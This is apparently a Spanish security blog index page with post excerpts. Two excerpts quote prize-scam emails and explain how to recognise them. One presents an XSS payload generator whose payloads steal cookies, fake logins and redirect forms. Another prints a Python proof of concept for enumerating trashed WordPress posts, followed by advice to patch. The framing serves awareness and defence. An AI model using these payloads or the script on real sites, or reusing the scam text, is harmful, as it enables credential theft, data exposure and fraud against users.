Mastercard y Microsoft me premiaron!!

No puedo creer que sea una persona tan afortunada, hace poco Me gané 2 Millones de Dolares!!, y ahora Mastercard en asociación con Microsoft han reunido la suma de £952,000.00 (novecientos cincuenta y dos mil libras Gran Bretaña), para regalarlas en un sorteo donde el ganador resulte ser yo!!!. MASTERCARD ® / MICROSOFT ® PREMIO MAYOR SÚPER INTERNACIONAL. Director Ejecutivo: Sr. Adam Smith. ATTENTION: MasterCard/Microsoft Windows Award Winner: Su dirección de correo electrónico fue seleccionado y confirmado por nuestra Internacional copatrocinador Microsoft, a través de su software más reciente de Internet. Usted ha sido aprobado tanto por MasterCard ® Internacional / Microsoft ® Corporation del Reino Unido la suma de £952,000.00 (novecientos cincuenta y dos mil libras Gran Bretaña). Estos fondos son en efectivo, mediante abono en un cheque de caja válida, con un Reg ganar. (GXC/001620-UK4). Estar informado de que su premio ha sido asegurado y listo para entregar el dinero a usted. Usted está en contacto con su oficial de créditos asignados a continuación con su información requerida es: Departamento de Verificación de Reclamaciones. Nombre Srs. Maria Kalsson Nurmi Correo electrónico: [email protected] Envíe realmente al susodicho Administrador de Reclamaciones por correo electrónico, inmediatamente con este Reclama Exigencias; 1. El Nombre 2 Lleno. Dirección: 3. Nacionalidad: 4. Edad: 5.Ocupación: Naturaleza de Trabajo: 6. Telefonear: Fax: 7. Estado de Origen: País: 8.Sexo: 9. Ganancia de Correo electrónico Dirección: Modo de Premio Entrega de Remittance:Courier de su Cheque de Ganancia Certificadoy otros Documentos de Ganancia sin peligro a usted. Atentamente, Doctor Margarita Munoz. Diríjasse Cliente Se preocupan el Servicio. Copyright © 2010 MasterCard Inc el Reino Unido Si no alcanzaste a notar el tono sarcástico (debería existir una etiqueta para ese fin, de pronto en el HTML 6..), déjame te explico de que se trata todo esto. El correo que acabas de ver anteriormente es una variante de un conocido fraude en Internet llamado “Estafa Nigeria”. La estafa Nigeriana es un fraude que normalmente se realiza por correo electrónico, consiste en ilusionar a la víctima con una gran fortuna, que en realidad no existe, con el objetivo de persuadirla para que luego envíe una”pequeña” suma de dinero por adelantado como condición para acceder a la supuesta fortuna. Es decir, se le promete a la víctima el todo o parte de una inexistente cantidad millonaria de dinero, para luego convencerla – mediante excusas muy elementales inventadas – a adelantar cierta cantidad de dinero propio al estafador. Claramente este mensaje en particular, ha sido adaptado para el publico de habla hispana, pero al parecer es un español traducido por Google (note los errores como “Diríjasse Cliente Se preocupan el Servicio.”), al responder...

Leer Más

X Campo – Generador de payloads XSS

XCampo es un generador de payloads XSS que nos brinda la posibilidad de sacarle mas jugo a una vulnerabilidad de este tipo en un sitio web, después de seleccionar el payload deseado, nos generara el código y seleccionamos si deseamos aplicarle rawurlencode() o quitarle las comillas: De momento los payloads con los que cuenta la herramienta son: Fake login: Genera un div sobre el resto de la pagina con un campo de login falso. Los datos se envían al sitio web que nosotros queramos y ya ahí somos responsables de hacer lo que queramos con el usuario. hax0r defacement: Intenta poner un div sobre toda la pagina, incluir un texto e incluso reproducir una cancion. Form redirection: Muy útil en ataques XSS que se encuentran en las paginas de login. Cambia el evento action de todos los forms a la dirección que le digamos. Ademas elimina cualquier tipo de Javascript de validación que existiera, por si acaso! Password managers: La idea es, haciendo uso de Javascript, robar la informacion que los navegadores autocompletan cuando hemos guardado el usuario y contraseña en una pagina. Por ahora solo esta implementado el de Internet Explorer, pero el de Firefox no seria dificil de hacer. Session cookies: Lo mas típico! Podemos enviar las cookies de un navegador hacia el dominio que queramos. Ademas existen tres maneras de hacerlo: iframe img pop-up Aunque es un proyecto joven, promete ser una buena herramienta para enviar el típico alert(hola);, si deseas utilizar el X Campo, puedes hacerlo online entrando a esta url (no es la ultima versión) o descargar el código fuente desde Google Code y montarlo en tu propio sistema (la ultima versión). Mas Información: Pagina Oficial del...

Leer Más

Me gané 2 Millones de Dolares!!

Así es, la persona que les escribe estas lineas es Millonaria!!… acabo de recibir una carta de la Fundación Carlos Slim en la que me informan que he salido beneficiado para recibir la suma de 2 Millones de Dolares en efectivo… ¿no me creen?… miren el correo. Antes de que me envíes un correo pidiéndome dinero prestado, déjame te explico de que se trata todo esto. El correo que acabas de ver anteriormente es una variante de un conocido fraude en Internet llamado “Estafa Nigeria”. La estafa Nigeriana es un fraude que normalmente se realiza por correo electrónico, consiste en ilusionar a la víctima con una gran fortuna, que en realidad no existe, con el objetivo de persuadirla para que luego envíe una”pequeña” suma de dinero por adelantado como condición para acceder a la supuesta fortuna. Es decir, se le promete a la víctima el todo o parte de una inexistente cantidad millonaria de dinero, para luego convencerla – mediante excusas muy elementales inventadas – a adelantar cierta cantidad de dinero propio al estafador. Claramente este mensaje en particular, ha sido adaptado para el publico latino,  por lo que se ha involucrando a Carlos Slim (la persona mas rica del mundo según Forbes) y esta escrito en un español bien trabajado, al responder el correo, el atacante empezara con sus dotes de ingeniería social (y armado de toda nuestra informacion personal proporcionada), creara una historia personalizada, con la que intentara sacarnos nuestro dinero… pero ¿y si realmente era la Fundación de Carlos Slim?, vamos a ver como podemos diferenciar fácilmente una estafa de este tipo de un correo normal. Como identificar una estafa por Internet? TE PIDEN ALGO: Normalmente este tipo de estafas te piden que realices alguna acción, ya sea visitar un enlace, responder el correo, enviar informacion, llamar a un numero… Cuando veas un correo en el que te piden que realices alguna acción, revisalo muy bien, a menos que confíes plenamente en la persona que te envió el correo y confirmes personalmente que efectivamente esa persona fue quien te envió ese mail, NO HAGAS NADA TE OFRECEN ALGO A CAMBIO: Es mas fácil que realices una tarea si recibes algo a cambio, por eso siempre te ofrecerán algún beneficio a cambio de tu acción, mejor seguridad en tu cuenta bancaria, trabajo, grandes cantidades de dinero, viajes, objetos, etc.. DIRECCIONES DE CORREO: Por lo general las direcciones desde las que se envían estos correos dejan mucho que desear, para la veracidad de su historia, en muchos casos se ve como mandan los correos desde la cuenta [email protected] (ya que logra pasar la mayoría de filtros y llegar...

Leer Más

Recupera informacion de un CD o DVD rayado

Con el paso del tiempo los CDs y DVDs se van degradando poco a poco, tanto que la información almacenada en su interior puede llegar a ser ilegible por nuestra unidad lectora y podamos perder nuestra valiosa información. Normalmente, lo que haría una persona, seria mandar a “pulir” (de forma profesional o con algún método casero) el CD o DVD para eliminar los rayones que se encuentran en la capa exterior de su superficie, pero este procedimiento muchas veces termina con eliminar definitivamente la información y volver más delicado el disco. DVDisaster es una herramienta de seguridad que permite crear un archivo de corrección de errores para prevenir posibles pérdidas de información en un dispositivo de almacenamiento óptico, ya sea un CD o un DVD. El funcionamiento de DVDisaster es bien sencillo. En primer lugar, analiza el disco para comprobar la velocidad de lectura de la unidad y la legibilidad del disco; el segundo paso consiste en crear el archivo de corrección de errores y si fuera necesario, el tercer y cuarto paso permiten volver a analizar el disco y restaurar los posibles defectos a partir de él. Descargar DVDisaster para Recuperar tu Información en CD o DVD Más Información: Pagina Oficial de DVDisaster Completo Articulo en...

Leer Más

Pueden leer tu “Basura”

Un nuevo fallo en el famoso WordPress, descubierto por el investigador Thomas Mackenzie permitiría a “cualquier” persona los artículos, comentarios y paginas, que hayas borrado y se encuentren en la “papelera”. Desde la versión 2.9 de WordPress se implementó una nueva característica  llamada “papelera“, con la cual todos los artículos, comentarios o páginas “borradas” pasarían a la “papelera de reciclaje” para prevenir así que sean eliminados de forma accidental. Lo que descubrió Thomas Mackenzie es que en WordPress decidieron no ponerle restricción de acceso a los contenidos de la “papelera”, por lo que cualquier persona con privilegio 0 (Suscriptor) podría ver todo lo que estuviera almacenado en ella, el único inconveniente (y posiblemente la razón por la que dejaron este nivel de acceso), es que necesitamos conocer la ruta de los contenidos eliminados para poder acceder a ellos… cosa que Mackenzie pudo solucionar desarrollando este script en Python, con el que enumera los contenidos que tenemos en nuestra “papelera”. #/usr/bin/python # # WordPress > 2.9 Failure to Restrict URL Access PoC # # This script iterates through the WP post ID’s as an authenticated and unauthenticated user. # If the requests differ a ‘Trash’ post has been found. # # You will need an authenticated user cookie of any priveledge to run this script. # # Example cookie: # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8 # # Will only work with WP URLs with the ‘/?p={int}’ parameter. Would need to handle redirects (3xx) to handle all URL types. # # # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r) import httplib # Declare vars blogURL = “www.example.com” userCookie = “enter_cookie_here” postID = 0 #Leave at 0 conn = httplib.HTTPConnection(blogURL) Headers = {“Cookie” : userCookie} print print “Target = http://” + blogURL + “/?p=” + str(postID) print while 1: # Start non authenticated enumeration request = ‘/?p=’ + str(postID) conn.request(“GET”, request, “”) try: r1 = conn.getresponse() except: print “Connection error” data1 = r1.read() # Start authenticated enumeration conn.request(“GET”, request, None, Headers) try: r2 = conn.getresponse() except: print “Connection error” data2 = r2.read() # Compare the HTML body reponses if data1 != data2: print “+ Found! http://” + blogURL + request else: print request postID += 1 conn.close() Como pueden ver, en esta prueba de concepto, es necesario contar con una cookie de un usuario logueado en el sistema, cosa que no es difícil si el blog tiene el registro de usuarios activo (practica poco recomendada) o se puede conseguir mediante ingeniería social, por lo tanto es mas que recomendable que actualicen su instalación de WordPress a la versión 2.9.2 que ya cuenta con un parche para este problema de seguridad. Una vez más queda...

Leer Más

Siguenos!

O Puedes Subscribete

ANTES DE

SALIRTE ...

NO TE

ARREPENTIRÁS

!Gracias¡

NO OLVIDES NUESTRAS REDES SOCIALES